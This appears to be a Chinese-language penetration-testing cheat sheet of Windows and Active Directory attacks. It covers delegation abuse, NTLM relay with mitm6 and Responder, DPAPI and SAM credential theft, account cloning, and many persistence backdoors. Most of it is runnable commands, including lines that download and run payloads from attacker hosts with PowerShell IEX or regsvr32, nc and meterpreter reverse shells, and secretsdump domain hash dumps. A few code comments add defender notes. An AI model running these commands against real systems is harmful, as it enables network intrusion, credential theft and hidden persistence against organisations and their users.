>Get-DomainComputer dc|select name, msDS-AllowedToActOnBehalfOfOtherIdentity
用powermad添加一具备SPN的机器账户
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom
或
>$pass = ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force
>New-MachineAccount -MachineAccount newcom -Password $pass
或
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
获取添加的机器账户的SID
将添加的机器账户的SID设置给DC的msDS-AllowedToActOnBehalfOfOtherIdentity参数
>$SD=New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
设置完成后查看
配置ACL允许访问
>$RawBytes=Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' |select -expand msds-allowedtoactonbehalfofotheridentity;$Descriptor= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes,0;$Descriptor.DiscretionaryAcl
此时使用创建的机器账户的hash可伪造域管
先获取newcom的NTLM
>Rubeus.exe hash /password:123qwe!@# /user:newcom /domain:zone.com
导入票据伪造域管用户访问cifs服务
>Rubeus.exe s4u /user:newcom$ /rc4:00AFFD88FA323B00D4560BF9FEF0EC2F /impersonateuser:godadmin /msdsspn:cifs/dc.zone.com /ptt
成功获取到godadmin的tgs
>python ntlmrelayx.py -t ldaps://dc.zone.com --remove-mic --delegate-access -smb2support
>python printerbug.py zone.com/y@win7.zone.com 192.168.0.attack
>python getST.py -spn host/win7.zone.com 'zone.com/机器账户$:密码' -impersonate administrator -dc-ip 192.168.0.1
>export KRB5CCNAME=XX.ccache
>python secretsdump.py -k -no-pass dc.zone.com -just-dc
域控需启用ldaps,域机器启用ipv6
*当执行ntlmrelayx脚本时,遇到报错
修改
impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py ldapattack.py脚本,在510行上方加入
if self.config.interactive:
再重新安装>python setup.py install
使用mitm6通过ipv6接管dns服务器,配置好后开始请求网络的WPAD
>mitm6 -i eth1 -d zone.com
使用ntlmrelayx.py监听
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --add-computer
当目标重启网络、访问浏览器、重启电脑时会把攻击机视为代理服务器,当目标通过攻击机代理服务器访问网络时,攻击机将会向目标发送代理的认证请求,并中继NTLM认证到LDAP服务器上,完成攻击。
这里要使用ldaps,因为域控会拒绝在不安全的连接中创建账户。
可以看到
已经成功添加了一个机器账户RFAYOVCC密码6YdX.NXqQGyuR7[
使用此机器账户申请票据
>python getST.py -spn cifs/sub2k8.zone.com zone.com/RFAYOVCC\$ -impersonate y
>export KRB5CCNAME=y.ccache
获取shell
>python smbexec.py -no-pass -k sub2k8.zone.com
dumphash、缓存hash
>python secretsdump.py -k -no-pass sub2k8.zone.com
当域控机器未启用LDAPS,并且已获得域普通用户权限时
使用powermad创建一个机器账户newcom
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
或
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
后续正常操作即可。
内网存在java webdav时,PROPPATCH、PROPFIND、LOCK等请求方法接受XML作为输入时会形成xxe。攻击者要求采用NTLM认证方式时,webdav会自动使用当前用户的凭据认证。
使用ntlmrelayx监听
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
Burp发送xxe请求
PROPFIND /webdav HTTP/1.1
Host: 1.1.1.1
<?xml version"1.0" encoding="UFT-8"?>
<!DOCTYPE xxe [
<!ENTITY loot SYSTEM "http://10.1.1.101"> ]>
<D:xxe xmln:D="DAV:"><D:set><D:prop>
<a xmlns="http://xx.e">&loot;</a>
</D:prop></D:set></D:xxe>
内网中间人攻击脚本,kali内置
监听网络接口
>responder -I wlan0(eth0)
指定某台机器或网段:修改/etc/responder/Responder.py中RespondTo参数。
网段中有认证行为会捕获NTLMv2 hash
当访问一个不存在的共享时修改配置文件来解析
Xp
修改/usr/share/responder/servers/SMB.py定位到errorcode修改为\x71\x00\x00\xc0,删除掉/usr/share/responder/Responder.db
XP时使用\\cmd\share形式访问共享输入密码达4次会断开连接。
定位到
修改self.ntry != 10
Win7以上
修改/usr/share/responder/servers/SMB.py定位到##Session Setup 3
删除掉and GrabMessageID(data)[0:1] == "\x02",删除掉/usr/share/responder/Responder.db
修改后可以进行解析,捕获hash,否则会报错误64
>responder -I eth0 -v -F
F参数即可开启强制WPAD认证服务抓取 hash,访问IE或重启电脑即可发送欺骗认证获得hash。
重启也可以抓到
内网中使用文件包含漏洞和XSS
>Responder -I eth0 -v
http://10.1.1.1/file.php?file=\\10.1.1.12\share
http://10.1.1.1/xss.php?article=<img src=\\10.1.1.12\xx>
修改/etc/responder/Responder.conf文件,配置smb和http为Off,分别开启两个对话框,使用F参数启用WPAD欺骗浏览器,使用/usr/share/responder/tools中的MultiReplay.py进行中继攻击获得目标cmdshell。
>Responder -I eth0 -v -F
>python MultiReplay.py -t 192.168.0.115 -u ALL
使用hashcat破解 -m 5600为NTLMv2类型
>hashcat -m 5600 pass.txt wordlists.txt
域内机器可访问\\zone.com\SYSVOL\zone.com共享文件夹,翻看策略文件,查找groups.xml,ScheduledTasks\ScheduledTasks.xml,Printers\Printers.xml,Drives\Drives.xml,DataSources\DataSources.xml, Services\Services.xml等文件
使用powersploit脚本解密
使用msf的auxiliary/scanner/smb/smb_enum_gpp模块
>winrm quickconfig -q 启动winrm
或PS>Enable-PSRemoting -Force
生成木马并启动监听
放入已获得权限的机器C盘中
内网另外机器中执行
>net use \\192.168.0.115\c$
>winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.0.115\c\index.exe"}
>net user admin$ pass@123 /add /domain
>net group "Domain admins" admin$ /add /domain
>ssh -i id_rsa user@192.168.0.110
位置
C:\Users\用户名\AppData\Local\Microsoft\Credentials
查看命令
>cmdkey /list
>mimikatz log
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015
记录guidMasterKey: {572115f2-80b1-4b1e-be1b-425f5c7a8bfd}
#privilege::debug
#sekurlsa::dpapi
找到GUID为guidMasterKey的值下面的MasterKey: d928f5e02d2e9495f92bb…
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015 /masterkey: d928f5e02d2e9495f92bb…
密码为CredentialBlob值。
>net user test$ test /add
>net localgroup administrators test$ /add
注册表HKEY_LOCAL_MACHINE\SAM\SAM\
给予administrator SAM的完全控制和读取的权限
以下导出为1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$
记录HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$的默认类型000003EA
以下导出为2.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA
默认administrator默认类型为000001F4
以下导出为3.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
把000001F4(3.reg)的F值粘贴到000003EA(2.reg)的F值
修改后导入
>regedit /s 1.reg
>regedit /s 2.reg
删除net user test$ /del
Powershell脚本
https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1
需system权限
>Create-Clone -u 要创建的 -p 密码 -cu 想要克隆的
利用场景:
激活guest修改rid为管理员的
修改低权限用户rid
劫持rid之前普通用户1的rid值
使用msf的post/windows/manage/rid_hijack模块
运行后可以看到已经变为超管的rid值
此时普通用户1登录系统是为超管权限
激活来宾账户,修改其密码,加入administrators组
>net user guest /active:yes
>net user guest 123qwe!@#
>net localgroup administrators guest /ad
>move sethc.exe 1.exe
>copy cmd.exe sethc.exe
5下shift调用cmd
注册表
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
新建Utilman.exe,新建字符串值Debugger,指定为C:\Windows\System32\cmd.exe
> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 新建DWORD值GlobalFlag 16进制为200
创建:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe字符串值:MonitorProcess=muma.exe
DWORD值ReportingMode=1
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
添加一个监听
Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
查询是否添加成功
Meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
开启防火墙进站规则
> netsh firewall add portopening TCP 444 "name" ENABLE ALL
重启
> shutdown -r -t 0
查看注册表启动项
>REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
添加启动项
>REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /t REG_SZ /F /D "c:\windows\temp\update.exe"
删除启动项
>REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /f
>schtasks /Create /tn 名字 /tr 运行程序 /sc hourly /mo 1
>schtasks /create /S TARGET /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.0.107:8080/Invoke-PowerShellTcp.ps1''')'"
创建计划任务
>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM
查看计划任务
>schtasks /query | findstr "windowsupdate"
立即执行某项计划任务
>schtasks /run /tn "windowsupdate"
删除某项计划任务
>schtasks /delete /F /tn "windowsupdate"
普通用户权限计划任务
>schtasks /create /F /tn "windowsupdate" /tr "D:\user\zhangsan\file\windowsupdate.exe" /sc DAILY /mo 1 /ST 12:25
>schtasks /query | findstr "windowsupdate"
>schtasks /run /tn "windowsupdate"
>schtasks /delete /F /tn "windowsupdate"
>schtasks /tn "SysDebug" /query /fo list /v
注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls,新建名字为Default,值为c:\1.dll的项
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f dll >/root/1.dll
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
https://cdn.securityxploded.com/download/RemoteDLLInjector.zip
> RemoteDLLInjector64.exe PID c:\1.dll
注册表HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls下AppInit_DLLs设置为c:\1.dll,LoadAppInit_DLLs设置为1
Msf>use post/windows/manage/reflective_dll_inject
Msf>set session 1
Msf>set pid 1234
Msf>set path c:\\1.dll
Msf>run
&
migrate +pid
&
Meterpreter>run post/windows/manage/migrate
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下添加Userinit值
>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"
计算机\HKEY_CURRENT_USER\Environment
创建键值UserInitMprLogonScript值为c:\muma.exe
&
Powershell实现:
>Set-ExecutionPolicy RemoteSigned
保存ps1执行
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');"
# powershell反弹shell的payload参照msf中的web_delivery模块
计算机\HKEY_CURRENT_USER\Control Panel\Desktop
SCRNSAVE.EXE - 默认屏幕保护程序,改为恶意程序(设置备份)
ScreenSaveActive - 1表示屏幕保护是启动状态,0表示表示屏幕保护是关闭状态
ScreenSaverTimeout - 指定屏幕保护程序启动前系统的空闲时间,单位为秒,默认为900(15分钟)
>git clone https://github.com/khr0x40sh/metasploit-modules.git
>mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/
>reload_all
>use post/windows/mof_ps_persist
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set session 1
>run
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set exitonsession false
重启后还会上线
清除后门,进入meterpreter,resource 生成的rc文件
停止MOF
>net stop winmgmt
删除文件夹:C:\WINDOWS\system32\wbem\Repository\
>net start winmgmt
WinRM端口5985,win2012以上默认启动,2008开启命令
>winrm quickconfig -q
2012启用端口复用
>winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
2008启用WinRM后修改端口为80
>winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
后门连接和使用
本地开启WinRM并设置信任连接主机
>winrm quickconfig -q
>winrm set winrm/config/Client @{TrustedHosts="*"}
执行命令
>winrs -r:http://10.1.1.100 -u:administrator -p:password ipconfig /all
获取cmdshell
>winrs -r:http://10.1.1.100 -u:administrator -p:password cmd
只administrator允许远程登录WinRM,允许其他用户可以登录,执行注册表
>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
重启维持nc
>sc create ms binpath= "cmd /K start c:\nc\nc64.exe -d 192.168.0.51 4567 -e cmd.exe" start= delayed-auto error= ignore
重启维持psh
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=11111 -f psh-reflection >/var/www/html/xxx.ps1
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c \"IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/xxx.ps1')\"" start= delayed-auto error= ignore
重启维持Cobalt strike
配置监听器,生成web传递模块Powershell脚本
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.107:8080/a'))\"" start= delayed-auto error= ignore
Delay执行大概2分钟上线
>sc delete ms 卸载服务
Powershell
>powershell.exe new-service -Name nuoyani -BinaryPathName "C:\WINDOWS\Temp\360.exe" -StartupType Automatic
>$c2='new-';$c3='service -Name nuoyani -DisplayName OrderServ -BinaryPathName "C:\accc.exe" -StartupType Automatic'; $Text=$c2+$c3;IEX(-join $Text)
创建下载任务
>bitsadmin /create empire
下载的文件设置
>bitsadmin /addfile empire %comspec% c:\windows\temp\1.exe
设置传输时运行的命令,MSFvenom生成dll放入temp目录
>bitsadmin /SetNotifyCmdLine empire cmd.exe "cmd.exe /c rundll32 c:\windows\temp\1.dll,0"
(bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://x.com/shell.sct scrobj.dll")
启动任务
>bitsadmin /resume empire
列出所有用户的下载任务
>bitsadmin /list /allusers /verbose
重启后也会上线
完成任务
>bitsadmin /complete empire
>bitsadmin /cancel <Job> //删除某个任务
>bitsadmin /reset /allusers //删除所有任务
&
>bitsadmin /create mission
>bitsadmin /addfile mission %comspec% %temp%\cmd.exe
>bitsadmin.exe /SetNotifyCmdLine mission regsvr32.exe "/u /s /i:http://192.168.0.107/shell.sct scrobj.dll"
>bitsadmin /Resume mission
劫持调用.net程序,开机启动
https://github.com/3gstudent/CLR-Injection/blob/master/CLR-Injection_x64.bat
WMIC可替换为powershell
New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null
New-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
添加全局变量
计算机\HKEY_CURRENT_USER\Environment
COR_ENABLE_PROFILING=1
COR_PROFILER={11111111-1111-1111-1111-111111111111}
注册CLSID
计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32
新建一个键ThreadingModel,键值为:Apartment,默认键值为dll路径
劫持explorer.exe
>SET COR_ENABLE_PROFILING=1
>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}
位置(新建)
HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32默认值为恶意DLL
新建ThreadingModel值为Apartment
CAccPropServicesClass and MMDeviceEnumerator
无需超管权限,无需重启
https://github.com/3gstudent/COM-Object-hijacking
将恶意DLLbase64编码写入ps脚本
执行后会在
%appdata%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}目录释放2个文件,分别是x86和x64的dll
会在注册表中
HKEY_CURRENT_USER\Software\Classes\CLSID\
新建
{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}和子项默认指向恶意DLL
只要指向.net程序便可上线。如ie,mmc等
注册表位置:HKCU\Software\Classes\CLSID\
创建项{42aedc87-2188-41fd-b9a3-0c966feabec1}
创建子项InprocServer32
Default的键值为恶意dll的绝对路径:C:\test\1.dll
创建键值: ThreadingModel REG_SZ Apartment
HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}
创建1.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Component"
progid="Component.WindowsUpdate"
version="1.00"
classid="{20002222-0000-0000-0000-000000000002}"
>
</registration>
<public>
<method name="exec">
</method>
</public>
<script language="JScript">
<![CDATA[
function exec(){
new ActiveXObject('WScript.Shell').Run('calc.exe');
}
]]>
</script>
</scriptlet>
创建COM对象
>regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll
触发
>cscript 1.js
var test = new ActiveXObject("Component.TESTCB");
test.exec()
DLL劫持
注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\ExcludeFromKnownDlls下添加 "lpk.dll"(若无,自己创建)
ExcludeFromKnownDlls可使KnownDLLs失效
需要重新启动电脑
查找可劫持的DLL:
1.启动程序
2.使用Process Explorer查看该应用程序启动后加载的DLL。
3.从已经加载的DLL列表中,查找在上述“KnownDLLs注册表项”中不存在的DLL。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
4.编写第三步中获取到的DLL的劫持DLL。
5.将编写好的劫持DLL放到该应用程序目录下,重新启动该应用程序,检测是否劫持成功。
Explorer.exe启动调用winrar文件夹的RarExt.dll
Msf监听
复制dll文件到the-backdoor-factory文件夹中,加载恶意dll进原dll
>python backdoor.py -f RarExt.dll -s reverse_shell_tcp_inline -P 12138 -H 192.168.0.107 指定为kali监听的IP和端口
生成好的dll在backdoored文件夹,传入靶机中,替换原dll文件,最好把原dll保存备份。
每次打开windows资源管理器的时候,即可上线。重启可维持
使用
https://github.com/coca1ne/DLL_Hijacker
https://github.com/git20150901/DLLHijack_Detecter
查看要劫持的DLL的函数导出表,会直接生成cpp源码,重编译指向恶意代码
DLLHijack_Detecter可查看程序加载的不在KnownDLLs中的DLL
服务名称MSDTC,显示名称Distributed Transaction Coordinator
对应进程msdtc.exe,位于%windir%\system32
C:\Windows\System32\wbem\
服务启动搜索注册表位置计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=4444 -f dll -o /var/www/html/oci.dll
Oci.dll放入c:\windows\system32\
重启服务即可
>taskkill /f /im msdtc.exe
自动化查找可劫持的DLL
https://github.com/sensepost/rattler
使用
>Rattler_x64.exe calc.exe 1
会列出可被劫持的DLL
按程序读取DLL位置顺序,把恶意DLL放入程序同目录后,执行程序即可。
右键对应的注册表路径是
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers
使用autoruns查看加载的DLL
以rarext.dll为例
使用https://github.com/rek7/dll-hijacking创建代理DLL
注意修改parse.py中dumpbin.exe的位置
>python3 parse.py -d rarext.dll
修改原DLL为rarext_.dll,重新生成解决方案命名为rarext.dll
将两个DLL放入原目录,重启
function Invoke-ScheduledTaskComHandlerUserTask
{
<#
.SYNOPSIS
Writes $Command as the (Default) value of the per-user InprocServer32 key for CLSID {58fb76b9-ac85-4e55-ac04-427593b1d060}.

.DESCRIPTION
Creates HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32 and sets its
(Default) value to $Command. The key lives under HKCU, so no elevation is needed; the page's own wording
("hijack the UserTask") suggests the CLSID belongs to a scheduled-task COM handler, so whatever later
instantiates that CLSID picks up $Command -- confirm the owner of the CLSID on the target OS.
Defender note: a newly created InprocServer32 key under HKCU\Software\Classes\CLSID for a CLSID that is
already registered machine-wide is the thing to alert on.

.PARAMETER Command
Path written as the (Default) value (the example call on the page passes a DLL path).

.PARAMETER Force
Overwrite an existing (default) value instead of stopping.

.NOTES
SupportsShouldProcess is declared but $PSCmdlet.ShouldProcess is never called, so -WhatIf has no effect.
Both failure branches call `exit`, which ends the calling script/host rather than just returning from the function.
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
    [Parameter(Mandatory = $True)]
    [ValidateNotNullOrEmpty()]
    [String]
    $Command,
    [Switch]
    $Force
)
$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
# Only write when there is no (default) value yet, unless -Force was given; SilentlyContinue hides the
# "key not found" error from Get-ItemProperty on a fresh machine.
if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
    New-Item $ScheduledTaskCommandPath -Force |
    New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
}else{
    Write-Verbose "Key already exists, consider using -Force"
    exit
}
# Post-check: confirm the key now exists; this only proves the key, not the value, was written.
if (Test-Path $ScheduledTaskCommandPath) {
    Write-Verbose "Created registry entries to hijack the UserTask"
}else{
    Write-Warning "Failed to create registry key, exiting"
    exit
}
}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
重启权限可维持
生成DLL
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.105/powersploit/CodeExecution/Invoke-DllInjection.ps1'); Invoke-DllInjection -ProcessID pid -Dll .\1.dll"
InjectProc
生成DLL
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/qq.dll
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
使用如下命令注入进程
>InjectProc.exe dll_inj qq.dll xx.exe(存在的进程)
添加到注册表中,只要运行control命令打开控制面板即可加载dll
编译为dll,这里是弹框测试
#include <Windows.h>
#include "pch.h"
//Cplapplet
// Exported entry point with the Control Panel applet signature (hwnd, message, two LPARAMs).
// The parameters are ignored; every call just shows a message box and returns 1. On this page it is a
// proof-of-loading stub for the CPLs registry registration shown after the listing, not a real applet.
extern "C" __declspec(dllexport) LONG Cplapplet(
    HWND hwndCpl,
    UINT msg,
    LPARAM lParam1,
    LPARAM lParam2
)
{
    MessageBoxA(NULL, "inject control panel.", "Control Panel", 0);
    return 1;
}
// DLL entry point. On DLL_PROCESS_ATTACH it calls Cplapplet directly, so the message box appears as soon as
// the DLL is mapped into a process, without waiting for a CPlApplet dispatch from the Control Panel.
// Note the missing `break` after the DLL_PROCESS_ATTACH block: control falls through into the following
// case labels, which only `break`, so the fall-through changes nothing here.
// Showing UI from DllMain runs under the loader lock; acceptable for this test stub, not for real code.
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        Cplapplet(NULL, NULL, NULL, NULL);
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\xxx\dll.dll" /f
低权限用户可指定.net应用程序使用自定义垃圾收集器(GC):自定义GC通过COMPLUS_GCName环境变量指定,只需将此环境变量指向恶意DLL;自定义GC的DLL需要导出一个名为GC_VersionInfo的函数。
下面是个弹框DLL
#include <Windows.h>
// Minimal DLL entry point: every attach/detach reason is a no-op and TRUE is returned so the load succeeds.
// The visible behaviour of this DLL lives entirely in the exported GC_VersionInfo below.
BOOL APIENTRY DllMain( HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
// Structure filled in by GC_VersionInfo. The layout presumably mirrors the version-info record the .NET
// runtime hands to a custom GC when COMPLUS_GCName is set -- TODO confirm against the runtime's GC interface header.
struct VersionInfo
{
    UINT32 MajorVersion;
    UINT32 MinorVersion;
    UINT32 BuildVersion;
    const char* Name;   // never written by this DLL; left as whatever the caller passed in
};
// Export the runtime looks up when COMPLUS_GCName points at this DLL (see the note above the listing).
// It zeroes BuildVersion twice and MinorVersion once; MajorVersion and Name are never set, which is
// probably a typo for MajorVersion on the first line. The message box is only proof that the DLL was
// loaded into a .NET process. Defender note: an unexpected COMPLUS_GCName environment variable (per-user,
// per-service or system-wide) is the indicator for this technique.
extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo * info)
{
    info->BuildVersion = 0;
    info->MinorVersion = 0;
    info->BuildVersion = 0;
    MessageBoxA(NULL, "giao", "giao", 0);
}
后执行任意.net程序可加载此DLL
当然也可以加载shellcode
https://github.com/am0nsec/MCGC
恶意DLL改名为fxsst.dll放置在c:\windows\目录即可实现对explorer.exe的劫持
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
允许DSRM账户远程访问
https://github.com/HarmJ0y/DAMP
效果:域内任何用户可读取域控hash
system权限执行
